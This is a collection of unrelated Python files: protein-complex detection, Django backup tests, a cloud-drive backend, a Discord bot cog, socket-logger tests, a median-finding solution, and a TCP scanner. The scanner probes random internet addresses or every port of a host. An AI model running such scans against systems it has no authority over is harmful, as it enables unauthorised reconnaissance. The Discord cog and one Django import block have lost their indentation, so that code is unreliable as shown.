def co_ach(g, density_threshold=0.7, affinity_threshold=0.225, closeness_threshold=0.5):
    """Detect protein complexes in PPI network *g* using the COACH algorithm.

    Args:
        g: graph object exposing ``edges()`` yielding vertex pairs
           (assumes a networkx-style graph -- TODO confirm against callers).
        density_threshold: minimum density for a preliminary core.
        affinity_threshold: NA-score threshold for redundancy filtering.
        closeness_threshold: minimum fraction of core neighbors a peripheral
            protein must have to be attached.

    Returns:
        A list of complexes, each a list of vertex ids.
    """
    # read protein-protein pairs into an adjacency map
    data = defaultdict(set)
    for a, b in g.edges():
        data[a].add(b)
        data[b].add(a)
    # step 1: find preliminary cores
    SC = []  # currently-detected preliminary cores
    count = 0  # NOTE(review): never used; kept to avoid behavior drift
    for vertex, neighbors in data.items():
        # build neighborhood graph induced by vertex and its neighbors
        vertices = {vertex} | neighbors
        size1_neighbors = set()
        graph = {}
        for v in vertices:
            n = data[v] & vertices
            if len(n) > 1:  # ignore size-1 vertices
                graph[v] = n
            else:
                size1_neighbors.add(v)
        if len(graph) < 2:  # not enough connections in this graph
            continue
        graph[vertex] -= size1_neighbors
        # get core graph: drop non-core vertices and their edges
        avg_deg, density = __graph_stats(graph)
        core_nodes = __get_core_nodes(graph, avg_deg)
        vertices = set(graph.keys())
        for v in vertices - core_nodes:
            del graph[v]
        for n in graph.values():
            n &= core_nodes
        if len(graph) < 2:  # not enough connections in this graph
            continue
        graph_nodes = set(graph)
        # inner loop: refine each dense subgraph of the core
        for sg in __core_removal(graph, density_threshold):
            while True:
                _, density = __graph_stats(sg)
                # if density threshold met, stop; else, remove min degree node
                if density >= density_threshold:
                    break
                w = min(sg.items(), key=lambda k: len(k[1]))[0]
                del sg[w]
                for n in sg.values():
                    n.discard(w)
            sg_nodes = set(sg)
            # greedily add back the best-connected remaining node while
            # density stays above threshold
            while graph_nodes - sg_nodes:
                w = max(graph_nodes - sg_nodes, key=lambda v: len(graph[v] & sg_nodes))
                new_sg = sg.copy()
                # NOTE(review): shallow copy -- the neighbor sets are shared
                # with sg, so n.add(w) below also mutates sg; verify intended.
                for v, n in new_sg.items():
                    if w in graph[v]:
                        n.add(w)
                new_sg[w] = graph[w] & sg_nodes
                _, density = __graph_stats(new_sg)
                if density < density_threshold:
                    break
                sg = new_sg
                sg_nodes.add(w)
            # redundancy filtering: keep only one of two highly-similar cores
            max_sim = -1
            for i in range(len(SC)):
                sim = __NA_score(set(SC[i]), sg_nodes)
                if sim > max_sim:
                    max_sim = sim
                    index = i
            if max_sim < affinity_threshold:
                SC.append(sg)
            else:
                _, density_i = __graph_stats(SC[index])
                if density * len(sg) > density_i * len(SC[index]):
                    SC[index] = sg
    # step 2: adding peripheral proteins closely connected to each core
    clusters = set()
    for core in SC:
        nodes = frozenset(core)
        neighbors = (
            functools.reduce(lambda x, y: x | y, (data[v] for v in nodes)) - nodes
        )
        neighbors -= set(
            v
            for v in neighbors
            if float(len(data[v] & nodes)) / len(nodes) <= closeness_threshold
        )
        clusters.add(nodes | neighbors)
    return [list(c) for c in clusters]
|
import os
from django.core import management
from django.core.exceptions import ImproperlyConfigured
from django.test import TransactionTestCase
from django.test.utils import override_settings
try:
from unittest import skipIf
except ImportError:
# Python 2.6 doesn't include skipIf, but Django 1.6 has a copy
from django.utils.unittest import skipIf
import django
TEST_APP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def _get_migrations():
    """Return the names of applied South migrations, oldest first."""
    from south.models import MigrationHistory
    history = MigrationHistory.objects.all().order_by('id')
    return list(history.values_list('migration', flat=True))
@override_settings(SOUTH_TESTS_MIGRATE=True)
class BackupTestCase(TransactionTestCase):
    """Tests for avocado's metadata backup/restore and migration commands."""

    def test_fixture_dir(self):
        # Fixture dir should resolve relative to the test app.
        from avocado.core import backup
        self.assertEqual(backup.get_fixture_dir(),
                         os.path.join(TEST_APP_DIR, 'fixtures'))

    def test_safe_load_tmp(self):
        # safe_load with no explicit path writes the backup to a temp file.
        from avocado.core import backup
        from avocado.models import DataField
        management.call_command('avocado', 'init', 'tests', quiet=True)
        self.assertEqual(DataField.objects.count(), 12)
        backup_path = backup.safe_load('0001_avocado_metadata')
        self.assertTrue(os.path.exists(backup_path))
        self.assertEqual(DataField.objects.count(), 3)
        os.remove(backup_path)

    def test_safe_load(self):
        # safe_load honors an explicit backup_path.
        from avocado.core import backup
        from avocado.models import DataField
        management.call_command('avocado', 'init', 'tests', quiet=True)
        self.assertEqual(DataField.objects.count(), 12)
        backup_path = backup.safe_load('0001_avocado_metadata',
                                       backup_path='backup.json')
        self.assertTrue(os.path.exists('backup.json'))
        self.assertEqual(DataField.objects.count(), 3)
        os.remove(backup_path)

    def test_fixture_filenames(self):
        from avocado.core import backup
        filenames = backup._fixture_filenames(backup.get_fixture_dir())
        self.assertEqual(filenames, ['0001_avocado_metadata.json'])

    def test_next_fixture_name(self):
        # Next fixture name increments the numeric prefix.
        from avocado.core import backup
        from avocado.conf import settings
        filename = backup.next_fixture_name(settings.METADATA_FIXTURE_SUFFIX,
                                            backup.get_fixture_dir())
        self.assertEqual(filename, '0002_avocado_metadata')

    @skipIf(django.VERSION >= (1, 7), "South isn't supported in Django 1.7")
    def test_migration_call(self):
        from avocado.core import backup
        from south import migration
        management.call_command('avocado', 'migration', quiet=True)
        migration_dir = os.path.join(TEST_APP_DIR, 'migrations')
        self.assertTrue(os.path.exists(os.path.join(migration_dir,
                                                    '0002_avocado_metadata_migration.py')))
        # Clean up the generated migration and fixture files.
        os.remove(os.path.join(migration_dir,
                               '0002_avocado_metadata_migration.py'))
        os.remove(os.path.join(backup.get_fixture_dir(),
                               '0002_avocado_metadata.json'))
        # TransactionTestCase rolls back the database after each test case,
        # but South does not know this, courtesy of caching in
        # migration.Migrations.
        migration.Migrations._clear_cache()

    @skipIf(django.VERSION >= (1, 7), "South isn't supported in Django 1.7")
    def test_migration_call_no_fake(self):
        # This test superficially looks like it tests the --no-fake switch,
        # but it doesn't fully succeed, because the Django managemement
        # API can't duplicate the behavior of command line boolean switches.
        # The --no-fake switch bug (#171) can't be tested via the internal
        # API. In fact, any test case for a boolean switch has to
        # execute a shell command. That opens a can of worms, because
        # to perform a migration in a shell command, we would have to replace
        # TransactionTestCase with TestCase, which would require substantial
        # changes to this test class. This is an awful lot of work for one
        # trivial bug fix.
        from avocado.core import backup
        from south import migration
        management.call_command('avocado', 'migration', no_fake=True,
                                quiet=True)
        migrations = _get_migrations()
        self.assertEqual(migrations, [])
        migration_dir = os.path.join(TEST_APP_DIR, 'migrations')
        self.assertTrue(os.path.exists(os.path.join(migration_dir,
                                                    '0002_avocado_metadata_migration.py')))
        os.remove(os.path.join(migration_dir,
                               '0002_avocado_metadata_migration.py'))
        os.remove(os.path.join(backup.get_fixture_dir(),
                               '0002_avocado_metadata.json'))
        migration.Migrations._clear_cache()

    def test_migration(self):
        management.call_command('migrate', 'core', verbosity=0)

    def test_missing_setting(self):
        # _check_app must raise when METADATA_MIGRATION_APP is unset.
        from avocado.conf import settings
        previous = settings.METADATA_MIGRATION_APP
        setattr(settings._wrapped, 'METADATA_MIGRATION_APP', None)
        try:
            from avocado.core import backup  # noqa
            backup._check_app()
            self.assertTrue(False)
        except ImproperlyConfigured:
            self.assertTrue(True)
        finally:
            setattr(settings._wrapped, 'METADATA_MIGRATION_APP', previous)
|
import threading
import time
from concurrent.futures import as_completed
from altfe.interface.cloud import interCloud
from app.lib.core.aliyundrive.aliyundrive import AliyunDrive
@interCloud.bind("cloud_aliyundrive", "LIB_CORE")
class CoreAliyunDrive(interCloud):
    """Aliyun Drive cloud backend: account login, token refresh and
    recursive file-list caching."""

    def __init__(self):
        super().__init__()
        self.conf = self.INS.conf.dict("aliyundrive")
        self.api = {}           # account name -> AliyunDrive client
        self.listOutdated = 0   # epoch time after which the cache is stale
        self.rootPath = [x for x in self.conf["rootPath"].split("/") if x != ""]
        self.auto()

    def auto(self):
        """Log in every configured account and start the refresh thread."""
        if self.conf["accounts"] is None:
            return
        self.is_on = True
        _token = self.loadConfig(self.getENV("rootPathFrozen") + "app/config/.token/aliyundrive.json", default={})
        for u in self.conf["accounts"]:
            if u not in _token:
                # No stored token: ask the operator for one interactively.
                print(f"[阿里云盘@{u}] 根据此网址「https://media.cooluc.com/decode_token/」的方法获取 Refresh Token 或 BizExt 以登录")
                _input = str(input(f"Refresh_Token or BizExt: ").strip())
                if len(_input) > 64:
                    # Long input is a BizExt blob, not a bare refresh token.
                    rtCode = AliyunDrive.get_userinfo_via_bizext(_input)
                else:
                    rtCode = _input
            else:
                rtCode = _token[u]["refresh"]
            self.api[u] = AliyunDrive(rtCode)
            if not self.api[u].do_refresh_token():
                print(f"[AliyunDrive@{u}] 登录失败")
        self.__save_token()
        t = threading.Timer(0, self.__check)
        # Modernization: Thread.setDaemon() is deprecated since Python 3.10;
        # assign the daemon attribute instead (same behavior).
        t.daemon = True
        t.start()

    def __check(self):
        """Background loop: refresh tokens near expiry and reload the list."""
        while True:
            tim = time.time()
            isUP = False
            for u in self.api:
                # Refresh tokens within 10 minutes of expiry.
                if tim > self.api[u].get_token("expire") - 600:
                    try:
                        self.api[u].do_refresh_token()
                    except Exception as e:
                        self.STATIC.localMsger.error(e)
                    else:
                        isUP = True
            if isUP:
                self.__save_token()
            if tim > self.listOutdated:
                self.load_list()
            time.sleep(self.conf["sys_checkTime"])

    def __save_token(self):
        """Persist every account's current token set to disk."""
        r = {}
        for u in self.api:
            r[u] = self.api[u].get_token()
        self.STATIC.file.aout(self.getENV("rootPathFrozen") + "app/config/.token/aliyundrive.json", r)

    def load_list(self):
        """Rebuild the cached file listing for every account."""
        if self.is_on is False:
            return False
        for u in self.conf["accounts"].copy():
            self.inCheck = True
            tmp = []
            try:
                self.__pro_load_list(u, tmp)
                psws = interCloud.process_add_password(tmp)
            except Exception as e:
                self.STATIC.localMsger.error(e)
            else:
                # Swap in the fresh listing under the lock.
                self.lock.acquire()
                self.dirPassword[u] = psws
                self.list[u] = tuple(tmp)
                self.lock.release()
                print(f"[AliyunDrive] {u} list updated at " + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
            self.inCheck = False
        self.listOutdated = time.time() + self.conf["sys_dataExpiredTime"]
        return True

    def __pro_load_list(self, user, arr, nowID="root", strURI="", rootIndex=0):
        """Recursively collect entries under *nowID* into *arr* (in place)."""
        isStart = True
        data = self.api[user].get_list(nowID)
        # Descend into the configured root path first, if not yet reached.
        for file in data:
            if len(self.rootPath) != 0 and rootIndex <= len(self.rootPath) - 1:
                isStart = False
                if file["type"] == "folder" and file["name"] == self.rootPath[rootIndex]:
                    self.__pro_load_list(
                        user, arr, file["file_id"], strURI + "/" + file["name"], rootIndex + 1
                    )
                continue
        if not isStart:
            return
        status = []
        for file in data:
            # Skip folders/files excluded by configuration.
            if self.STATIC.util.isNeedLoad(file["type"] == "folder", str(file["name"]), self.conf):
                continue
            # Build the listing entry for this file or folder.
            item = {
                "isFolder": file["type"] == "folder",
                "createTime": 0,
                "lastOpTime": self.STATIC.util.format_time(file["updated_at"]),
                "parentId": file["parent_file_id"],
                "fileId": file["file_id"],
                "filePath": strURI + "/" + file["name"],
                "fileName": str(file["name"]),
                "fileSize": self.STATIC.util.format_size(file["size"]) if file["type"] != "folder" else -1,
                "fileType": None,
                "child": [],
                "user": user,
                "isSecret": False,
                "driveName": "aliyundrive"
            }
            if not item["isFolder"]:
                item["fileType"] = str(item["fileName"]).split(".")[-1]
            else:
                # Load folder contents concurrently on the shared pool.
                status.append(self.COMMON.thread.plz().submit(self.__pro_load_list, *(
                    user, item["child"], item["fileId"], strURI + "/" + file["name"], rootIndex)))
            arr.append(item)
        # Block until every spawned folder listing has finished.
        for x in as_completed(status):
            pass

    def info(self, user, fid, dl=False):
        """Return a download URL for *fid*, re-authenticating once on failure."""
        try:
            return self.api[user].get_download_url(fid)
        except Exception as e:
            self.STATIC.localMsger.error(e)
            self.STATIC.localMsger.green(f"[AliyunDrive] {user} try to login")
            try:
                self.api[user].do_refresh_token()
                return self.api[user].get_download_url(fid)
            except Exception as ee:
                self.STATIC.localMsger.error(ee)
                return False
|
# Copyright (c) 2019-2022 ThatRedKite and contributors
import discord
import aioredis
from discord.ext import commands, tasks
from discord.ext.commands.errors import CommandInvokeError
from thatkitebot.backend.util import errormsg
from thatkitebot.backend import cache
class ListenerCog(commands.Cog):
"""
The perfect place to put random listeners in.
"""
def __init__(self, bot):
self.dirname = bot.dirname
self.redis_cache: aioredis.Redis = bot.redis_cache
self.redis_welcomes: aioredis.Redis = bot.redis_welcomes
self.repost_redis: aioredis.Redis = bot.redis_repost
self.bot: discord.Client = bot
@commands.Cog.listener()
async def on_command_error(self, ctx: commands.Context, error: CommandInvokeError):
match type(error):
case commands.CommandOnCooldown:
await errormsg(ctx, f"Sorry, but this command is on cooldown! Please wait {int(error.retry_after)} seconds.")
case commands.CommandInvokeError:
if self.bot.debugmode:
await errormsg(ctx, repr(error))
raise error
case commands.CheckFailure:
await errormsg(ctx, "A check has failed! This command might be disabled on the server or you lack permission")
case commands.MissingPermissions:
await errormsg(ctx, "Sorry, but you don't have the permissions to do this")
case commands.NotOwner:
await errormsg(ctx, "Only the bot owner can do this! Contact them if needed.")
@tasks.loop(hours=1.0)
async def reset_invoke_counter(self):
self.bot.command_invokes_hour = 0
@commands.Cog.listener()
async def on_ready(self):
print("\nbot successfully started!")
self.reset_invoke_counter.start()
await self.bot.change_presence(
activity=discord.Activity(name="a battle against russia", type=5),
status=discord.Status.online,
)
@commands.Cog.listener()
async def on_command_completion(self, ctx):
self.bot.command_invokes_hour += 1
self.bot.command_invokes_total += 1
@commands.Cog.listener()
async def on_slash_command_error(self, ctx, ex):
raise ex
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
try:
await cache.add_message_to_cache(self.redis_cache, message)
except:
print("could not add message to cache!")
"""
@commands.Cog.listener()
async def on_raw_message_delete(self, payload: discord.RawMessageDeleteEvent):
try:
key = f"{hex(payload.guild_id)}:{hex(payload.channel_id)}:{hex(payload.cached_message.author.id)}:{hex(payload.message_id)}"
if await self.redis_cache.exists(key):
await self.redis_cache.delete(key)
# delete the associated repost if it exists
if len(rkeys := [rkey async for rkey in self.repost_redis.scan_iter(match=f"{payload.message_id}:*")]) > 0:
await self.repost_redis.delete(rkeys[0])
except:
pass
@commands.Cog.listener()
async def on_raw_message_edit(self, payload):
try:
key = f"{hex(payload.guild_id)}:{hex(payload.channel_id)}:{hex(payload.cached_message.author.id)}:{hex(payload.message_id)}"
if await self.redis_cache.exists(key):
await cache.add_message_to_cache(self.redis_cache, payload.cached_message)
except:
print("could not edit cached message")
"""
def setup(bot):
    # Standard discord.py extension entry point: register this cog on load.
    bot.add_cog(ListenerCog(bot))
|
<gh_stars>0
import socket
import time
import getopt
import sys
import mysql.connector
import signal
import os
from sys import argv
from prettytable import PrettyTable
from random import randint, choice
from string import hexdigits
# --- scanner configuration, overridden by the command-line options parsed
# --- in the __main__ block below ---
ip = "localhost"        # default target (note: __main__ actually uses `address`)
port = 80               # default port (-p/--port)
timeout = 1             # socket timeout in seconds (-t/--timeout)
retry = 1               # connection attempts per host in checkHost()
_range = 10             # number of random probes (-r/--range)
delay = 0               # sleep between retries in checkHost()
verbose = False         # also print DOWN/CLOSED results (-v/--verbose)
single_address = True   # False => probe random addresses (-a/--r-address)
single_port = True      # False => probe random ports (-b/--r-port)
up = 0                  # module-level counters (main() shadows these with locals)
down = 0
db = False              # True => record open hosts to MySQL (-d/--database)
portscan = False        # True => scan all ports of one host (-s/--portscan)
# Database connection opened unconditionally at import time.
# NOTE(review): "<PASSWORD>" looks like an anonymisation placeholder — the
# real credential must be supplied before this runs.
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    passwd="<PASSWORD>",
    database="ipscanner"
)
mycursor = mydb.cursor()
full_cmd_arguments = argv
argument_list = full_cmd_arguments[1:]
arguments = len(argv) - 1
# getopt option specs; options with '=' / ':' take a parameter.
short_options = "hp:vt:r:abi:ds"
long_options = ["help", "port=", "verbose",
                "timeout=", "range=", "r-address", "r-port", "ip-address=", "database", "portscan"]
def handler(signum, frame):
    # SIGINT handler: report the interrupt and hard-exit immediately
    # (os._exit skips atexit handlers and buffered-output flushing).
    print("\nKeyboardInterrupt")
    os._exit(0)
signal.signal(signal.SIGINT, handler)
def random_ip():
    """Return a random dotted-quad IPv4 address as a string."""
    return ".".join(str(randint(0, 255)) for _ in range(4))
def isOpen(ip, port):
    """Return True if a TCP connection to (ip, port) succeeds.

    Uses the module-level `timeout` global set via -t/--timeout.
    The socket is always closed, whether or not the connect succeeds.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip, int(port)))
        s.shutdown(socket.SHUT_RDWR)
        return True
    except (OSError, ValueError):
        # OSError covers refused/timed-out/unreachable connections and
        # ValueError a malformed port; the previous bare `except:` also
        # swallowed KeyboardInterrupt and SystemExit.
        return False
    finally:
        s.close()
def checkHost(ip, port):
    """Probe (ip, port) up to `retry` times, sleeping `delay` seconds
    after each failed attempt; return True on the first success."""
    for _ in range(retry):
        if isOpen(ip, port):
            return True
        time.sleep(delay)
    return False
def _probe_and_report(host, port, up_word, down_word, always_report_down=False):
    """Probe one (host, port), print the result and optionally record it.

    Returns True when the port answered.  Honours the module-level
    `verbose` and `db` flags; DOWN/CLOSED lines are printed only in
    verbose mode unless always_report_down is set.
    """
    if checkHost(host, port):
        print(f"{host}:{port} is {up_word}")
        if db:
            InsertToDB(host, port)
        return True
    if always_report_down or verbose:
        print(f"{host}:{port} is {down_word}")
    return False


def main(ip, port):
    """Run the scan selected by the module-level mode flags.

    Modes: portscan (every port of one host), fixed host+port, random
    ports, random hosts, or both random.  Prints a summary at the end.
    """
    signal.signal(signal.SIGINT, handler)
    up = 0
    down = 0
    print("------------------------------")
    print("Starting...")
    print("------------------------------")
    if portscan:
        # BUGFIX: removed a leftover debug `raise KeyboardInterrupt('hello')`
        # that aborted every portscan as soon as it reached port 100.
        for scan_port in range(65536):
            if _probe_and_report(ip, scan_port, "OPEN", "CLOSED"):
                up += 1
            else:
                down += 1
    elif single_address and single_port:
        # One host, one port: always report the result; counters stay at 0
        # (matches the original behaviour).
        _probe_and_report(ip, port, "UP", "DOWN", always_report_down=True)
    elif single_address:
        for _ in range(_range):
            port = randint(0, 65535)
            if _probe_and_report(ip, port, "UP", "DOWN"):
                up += 1
            else:
                down += 1
    elif single_port:
        for _ in range(_range):
            ip = random_ip()
            if _probe_and_report(ip, port, "UP", "DOWN"):
                up += 1
            else:
                down += 1
    else:
        for _ in range(_range):
            ip = random_ip()
            port = randint(0, 65535)
            if _probe_and_report(ip, port, "UP", "DOWN"):
                up += 1
            else:
                down += 1
    print("------------------------------")
    if portscan:
        print(f"{up} ports were OPEN")
        print(f"{down} ports were CLOSED")
    else:
        print(f"{up} IPs were UP")
        print(f"{down} IPs were DOWN")
def InsertToDB(_ip, _port):
    """Persist one open (ip, port) pair via the module-level DB connection."""
    statement = "INSERT INTO results (IP, Port) VALUES (%s, %s)"
    mycursor.execute(statement, (_ip, str(_port)))
    mydb.commit()
if __name__ == '__main__':
    address = "localhost"
    port = 80
    try:
        arguments, values = getopt.getopt(
            argument_list, short_options, long_options)
    except getopt.error as err:
        # Unknown option or missing parameter: report and exit non-zero.
        print(str(err))
        sys.exit(2)
    # Assignments below rebind the module-level config globals, since this
    # code runs at module scope.
    for current_argument, current_value in arguments:
        if current_argument in ("-h", "--help"):
            print("Displaying help")
            x = PrettyTable()
            x.field_names = ["Argument", "Alternative",
                             "Parameter type", "Info", "Default"]
            x.add_row(["--help", "-h", "None", "Displays help", "None"])
            x.add_row(["--verbose", "-v", "None", "Enables verbose mode", "False"])
            x.add_row(["--port", "-p", "Integer", "Sets port to scan", "80"])
            x.add_row(["--timeout", "-t", "Float", "Sets scan timeout (seconds)", "1"])
            x.add_row(["--range", "-r", "Integer",
                       "Sets the amount of times to scan", "10"])
            x.add_row(["--r-address", "-a", "None",
                       "Enables random address mode", "False"])
            x.add_row(["--r-port", "-b", "None",
                       "Enables random port mode", "False"])
            x.add_row(["--ip-address", "-i", "Str",
                       "Sets IP address to scan", "localhost"])
            x.add_row(["--database", "-d", "None",
                       "Saves online addresses to a MySQL database", "None"])
            x.add_row(["--portscan", "-s", "None",
                       "Enables portscan mode", "False"])
            print(x)
            sys.exit()
        elif current_argument in ("-v", "--verbose"):
            print("Enabling verbose mode")
            verbose = True
        elif current_argument in ("-p", "--port"):
            print(f"Port set as {current_value}")
            port = int(current_value)
        elif current_argument in ("-t", "--timeout"):
            print(f"Timeout set as {current_value}")
            timeout = float(current_value)
        elif current_argument in ("-r", "--range"):
            print(f"Range set as {current_value}")
            _range = int(current_value)
        elif current_argument in ("-a", "--r-address"):
            print("Enabling random address mode")
            single_address = False
        elif current_argument in ("-b", "--r-port"):
            print("Enabling random port mode")
            single_port = False
        elif current_argument in ("-i", "--ip-address"):
            print(f"IP address set as {current_value}")
            address = current_value
        elif current_argument in ("-d", "--database"):
            print("Enabling database mode")
            db = True
        elif current_argument in ("-s", "--portscan"):
            print("Enabling portscan mode")
            portscan = True
    try:
        main(address, port)
    except Exception:
        # Was a bare `except:`; still report and hard-exit on failure, but
        # no longer masks SystemExit / KeyboardInterrupt.
        print(sys.exc_info())
        os._exit(0)
|
<gh_stars>100-1000
import unittest
import errno
import logging
import socket
from testfixtures import log_capture
import slimta.logging.socket
from slimta.logging import getSocketLogger
class FakeSocket(object):
    """Minimal socket stand-in exposing only fileno() and getpeername()."""

    def __init__(self, fd, peer=None):
        self.fd = fd
        self.peer = peer

    def fileno(self):
        """Return the fake file descriptor number."""
        return self.fd

    def getpeername(self):
        """Return the fake peer address (None when not supplied)."""
        return self.peer
class FakeContext(object):
    """SSL-context stand-in that reports a fixed session-statistics dict."""

    def session_stats(self):
        return {'hits': 13}
class TestSocketLogger(unittest.TestCase):
    # Exercises slimta's socket logger: each test drives one log method and
    # checks the exact DEBUG record it emits, captured by testfixtures'
    # @log_capture decorator (passed in as `l`).

    def setUp(self):
        # Fresh logger per test; records land in the 'test' channel.
        self.log = getSocketLogger('test')

    @log_capture()
    def test_send(self, l):
        sock = FakeSocket(136)
        self.log.send(sock, 'test send')
        l.check(('test', 'DEBUG', 'fd:136:send data=\'test send\''))

    @log_capture()
    def test_recv(self, l):
        sock = FakeSocket(29193)
        self.log.recv(sock, 'test recv')
        l.check(('test', 'DEBUG', 'fd:29193:recv data=\'test recv\''))

    @log_capture()
    def test_accept(self, l):
        # An explicit peer argument overrides the client socket's own peer.
        server = FakeSocket(926)
        client = FakeSocket(927, 'testpeer')
        self.log.accept(server, client)
        self.log.accept(server, client, 'testpeer2')
        l.check(('test', 'DEBUG', 'fd:926:accept clientfd=927 peer=\'testpeer\''),
                ('test', 'DEBUG', 'fd:926:accept clientfd=927 peer=\'testpeer2\''))

    @log_capture()
    def test_connect(self, l):
        sock = FakeSocket(539, 'testpeer')
        self.log.connect(sock)
        self.log.connect(sock, 'testpeer2')
        l.check(('test', 'DEBUG', 'fd:539:connect peer=\'testpeer\''),
                ('test', 'DEBUG', 'fd:539:connect peer=\'testpeer2\''))

    @log_capture()
    def test_encrypt(self, l):
        # The encrypt log line includes the TLS context's session stats.
        sock = FakeSocket(445)
        context = FakeContext()
        self.log.encrypt(sock, context)
        l.check(('test', 'DEBUG', 'fd:445:encrypt hits=13'))

    @log_capture()
    def test_shutdown(self, l):
        # SHUT_RD/SHUT_WR/SHUT_RDWR are rendered as 'read'/'write'/'both'.
        sock = FakeSocket(823)
        self.log.shutdown(sock, socket.SHUT_RD)
        self.log.shutdown(sock, socket.SHUT_WR)
        self.log.shutdown(sock, socket.SHUT_RDWR)
        l.check(('test', 'DEBUG', 'fd:823:shutdown how=\'read\''),
                ('test', 'DEBUG', 'fd:823:shutdown how=\'write\''),
                ('test', 'DEBUG', 'fd:823:shutdown how=\'both\''))

    @log_capture()
    def test_close(self, l):
        sock = FakeSocket(771)
        self.log.close(sock)
        l.check(('test', 'DEBUG', 'fd:771:close'))

    @log_capture()
    def test_error(self, l):
        # Second call checks that socket_error_log_level changes the level.
        sock = FakeSocket(680)
        exc = OSError(errno.EPIPE, 'Broken pipe')
        self.log.error(sock, exc, 'testaddress')
        slimta.logging.socket.socket_error_log_level = logging.WARNING
        self.log.error(sock, exc)
        l.check(('test', 'ERROR', 'fd:680:error address=\'testaddress\' args=(32, \'Broken pipe\') message=\'[Errno 32] Broken pipe\''),
                ('test', 'WARNING', 'fd:680:error args=(32, \'Broken pipe\') message=\'[Errno 32] Broken pipe\''))
# vim:et:fdm=marker:sts=4:sw=4:ts=4
|
<filename>python/BinarySearch/4_median_of_two_sorted_arrays.py
# !/usr/bin/env python
# coding: utf-8
'''
Description:
There are two sorted arrays nums1 and nums2 of size m and n respectively.
Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).
Example 1:
nums1 = [1, 3]
nums2 = [2]
The median is 2.0
Example 2:
nums1 = [1, 2]
nums2 = [3, 4]
The median is (2 + 3)/2 = 2.5
Tags: Binary Search, Array, Divide and Conquer
分析:
(1)直观的解法:
直接merge两个数组,然后求第k大的元素。时间为O(m+n)。
不过仅需要第k大的元素,不需要整个排序;可以用一个计数器记录当前已经找到第m大的元素。
同时使用两个指针pA和pB,分别指向A和B数组的第一个元素;使用类似merge sort的原理,
如果数组A当前元素小,那么pA++同时m++,如果数组B当前元素小,那么pB++同时m++。
最终当m=k时,就得到了想要的答案。O(k)的时间, O(1)的空间。但当k很接近m+n时,这个方法还是O(m+n)的。
(2)O(log(m+n)) 的解法:
将这道题转化为更通用的形式是: 给定两个已经排序好的数组,找到两者所有元素中第k小的元素。
median = (m+n)//2 是第(median+1)小的数
假设数组A和B的元素个数都大于k/2,将A的第k/2个元素(即A[k/2 -1])和B的第k/2个元素(即B[k/2 -1])比较:
+ A[k/2 -1] < B[k/2 -1]: 意味着A[0]到A[k/2 -1]都在topk元素范围内
+ A[k/2 -1] > B[k/2 -1]: 意味着B[0]到B[k/2 -1]都在topk元素范围内
+ A[k/2 -1] == B[k/2 -1]: 找到第k大的元素,直接返回A[k/2 -1]或B[k/2 -1]
递归函数的终止条件:
+ 当A或B为空时,直接返回B[k-1]或A[k-1]
+ 当k=1时,返回min(A[0], B[0])
+ 当A[k/2 -1] == B[k/2 -1]时,返回A[k/2 -1]或B[k/2 -1]
'''
class Solution(object):
    # O(m+n) runtime; O(m+n) space for the merged list
    def findMedianSortedArrays(self, nums1, nums2):
        """
        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: float
        """
        # Fully merge both sorted arrays, then pick the middle element(s).
        result, i, j = [], 0, 0
        m, n = len(nums1), len(nums2)
        while i < m and j < n:
            if nums1[i] < nums2[j]:
                result.append(nums1[i])
                i += 1
            elif nums1[i] > nums2[j]:
                result.append(nums2[j])
                j += 1
            else:
                result.extend([nums1[i], nums2[j]])
                i += 1
                j += 1
        while i < m:
            result.append(nums1[i])
            i += 1
        while j < n:
            result.append(nums2[j])
            j += 1
        if (m+n) % 2 == 1:
            return result[(m+n)//2]
        else:
            return (result[((m+n)//2)-1] + result[(m+n)//2]) / 2.0

    # O(k) runtime; O(1) space
    def findMedianSortedArrays2(self, nums1, nums2):
        """Median via a counting merge that stops at the k-th element."""
        total = len(nums1) + len(nums2)
        # BUGFIX: use floor division — on Python 3 `total/2` is a float,
        # which made findK compare and index with a non-integer k.
        # `//` behaves identically to the old `/` on Python 2 ints.
        if total % 2 == 1:
            return self.findK(nums1, nums2, total//2)
        else:
            return (self.findK(nums1, nums2, total//2 - 1) + self.findK(nums1, nums2, total//2)) / 2.0

    def findK(self, nums1, nums2, k):  # k: 0-based index of the wanted element
        """Merge-walk both arrays until the element at index k is reached."""
        m, n = len(nums1), len(nums2)
        i, j, index, kth = 0, 0, -1, 0
        while index < k and i < m and j < n:
            if nums1[i] <= nums2[j]:
                kth = nums1[i]
                i += 1
                index += 1
            else:
                kth = nums2[j]
                j += 1
                index += 1
        # One array exhausted: jump straight to the remaining offset.
        while index < k and i < m:
            kth = nums1[i+k-index-1]
            i += 1
            index += 1
        while index < k and j < n:
            kth = nums2[j+k-index-1]
            j += 1
            index += 1
        return kth

    # O(log(m+n)) runtime; O(log(m+n)) space for the recursion
    def findMedianSortedArrays3(self, nums1, nums2):
        """Median via recursive k-th-smallest selection."""
        total = len(nums1) + len(nums2)
        # Same floor-division fix as above (`total/2` is a float on Python 3).
        if total % 2 == 1:
            return self.find_kth(nums1, nums2, total//2 + 1)
        else:
            return (self.find_kth(nums1, nums2, total//2) + self.find_kth(nums1, nums2, total//2 + 1)) / 2.0

    # find kth number, index k+1
    def find_kth(self, nums1, nums2, k):
        """Return the k-th smallest (1-based) element of the two arrays,
        discarding k//2 elements from one array per recursion step."""
        m, n = len(nums1), len(nums2)
        # always assume that m is equal or smaller than n
        if m > n:
            return self.find_kth(nums2, nums1, k)
        if m == 0:
            return nums2[k-1]
        if n == 0:
            return nums1[k-1]
        if k == 1:
            return min(nums1[0], nums2[0])
        # divide k into two parts (floor division keeps pa an int on Python 3)
        pa = min(m, k//2)
        pb = k - pa
        if nums1[pa-1] < nums2[pb-1]:
            return self.find_kth(nums1[pa:], nums2, k - pa)
        elif nums1[pa-1] > nums2[pb-1]:
            return self.find_kth(nums1, nums2[pb:], k - pb)
        else:
            return nums1[pa-1]
if __name__ == '__main__':
    # Parenthesised print() works on both Python 2 and Python 3; the old
    # bare `print expr` statements only parsed on Python 2.
    print(Solution().findMedianSortedArrays([1, 3], [2]))      # output: 2
    print(Solution().findMedianSortedArrays2([1, 2], [3, 4]))  # output: 2.5
    print(Solution().findMedianSortedArrays3([1, 3], [2]))     # output: 2
